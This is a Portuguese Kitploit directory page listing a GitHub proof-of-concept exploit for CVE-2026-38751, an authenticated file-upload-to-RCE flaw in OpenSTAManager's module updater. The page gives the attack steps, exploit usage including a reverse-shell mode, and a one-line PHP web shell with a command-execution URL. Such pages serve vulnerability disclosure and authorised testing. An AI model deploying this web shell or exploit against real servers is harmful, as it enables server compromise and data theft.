Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC — Este repositório contém um exploit de prova de conceito (PoC) para CVE-2026-38751, que afeta OpenSTAManager ≤ 2.10. A vulnerabilidade permite que um atacante autenticado envie um módulo malicioso através da funcionalidade de atualização de módulo, levando ao upload arbitrário de arquivos e execução remota de código (RCE). | Kitploit
Ferramentas/GitHubGitHub/mkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubmkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc

CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC

Ver Repositório
1há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Este repositório contém um exploit de prova de conceito (PoC) para CVE-2026-38751, que afeta OpenSTAManager ≤ 2.10. A vulnerabilidade permite que um atacante autenticado envie um módulo malicioso através da funcionalidade de atualização de módulo, levando ao upload arbitrário de arquivos e execução remota de código (RCE).

Compartilhar

CVE-2026-38751 – OpenSTAManager Upload Arbitrário de Arquivos (PoC)

Este repositório contém um exploit de prova de conceito (PoC) para CVE-2026-38751, afetando OpenSTAManager ≤ 2.10. A vulnerabilidade permite que um atacante autenticado faça upload de um módulo malicioso através da funcionalidade de atualização de módulos, resultando em upload arbitrário de arquivos e execução remota de código (RCE).

Referência CVE

  • Entrada CVE MITRE (primeiro registro de divulgação): https://www.cve.org/CVERecord?id=CVE-2026-38751
  • NVD (NIST) Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2026-38751
  • GitHub Advisory Database https://github.com/advisories/GHSA-rm34-fg4m-39mw

Software Afetado

  • OpenSTAManager ≤ 2.10
  • Sistema de atualização de módulos (modules/aggiornamenti/upload_modules.php)

Descrição da Vulnerabilidade

A funcionalidade de atualização de módulos permite que usuários autenticados façam upload de módulos baseados em ZIP sem validação adequada do conteúdo do arquivo ou limites de execução. Um atacante pode criar um módulo malicioso contendo payloads PHP, que são então implantados na raiz web e executados através do contexto da aplicação. Isso resulta em:

  • Upload arbitrário de arquivos (CWE-434)
  • Execução remota de código via arquivos PHP enviados
  • Comprometimento total do contexto da aplicação

Fluxo de Ataque (Alto Nível)

  1. Autenticar no OpenSTAManager
  2. Enviar arquivo ZIP de módulo criado
  3. Acionar o processo de instalação/atualização do módulo
  4. Acessar o payload PHP enviado via raiz web
  5. Executar comandos arbitrários no servidor

##Impacto A exploração bem-sucedida permite:

  • Execução remota de comandos
  • Comprometimento do servidor web
  • Exfiltração de dados
  • Assunção total da aplicação dependendo dos privilégios

Requisitos

  • Conta de usuário autenticada válida
  • Acesso à funcionalidade de atualização de módulos ativada

Uso (PoC)

  1. Gerar módulo malicioso
root@kitploit:~
python exploit.py --build

Cria:

root@kitploit:~
update.zip
└── run/
    ├── MODULE
    └── evil.php
  1. Executar exploit
root@kitploit:~
python exploit.py <username> <password> <target_url>

Modo opcional de shell reverso:

root@kitploit:~
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>

Payload de Exemplo

root@kitploit:~
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>

Verificação

Se bem-sucedido, o seguinte endpoint executa comandos do sistema: /modules/run/evil.php?cmd=id

Referências MITRE / NVD

  • MITRE CVE Record: https://www.cve.org/CVERecord?id=CVE-2026-38751
  • NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

Aviso Legal

Este projeto é destinado a:

  • Fins educacionais
  • Testes de segurança autorizados
  • Ambientes de pesquisa

Não use contra sistemas sem permissão explícita.

Notas

A detecção pode variar dependendo da configuração do servidor. Algumas implantações podem desabilitar a execução direta de PHP em diretórios de módulos. O tempo de ativação do módulo pode exigir novas tentativas.

Agradecimentos

  • MITRE CVE Program
  • NIST National Vulnerability Database (NVD)
  • Mantenedores do projeto OpenSTAManager
  • https://github.com/fuutianyii/poc (Primeiro PoC)
Baixar ferramenta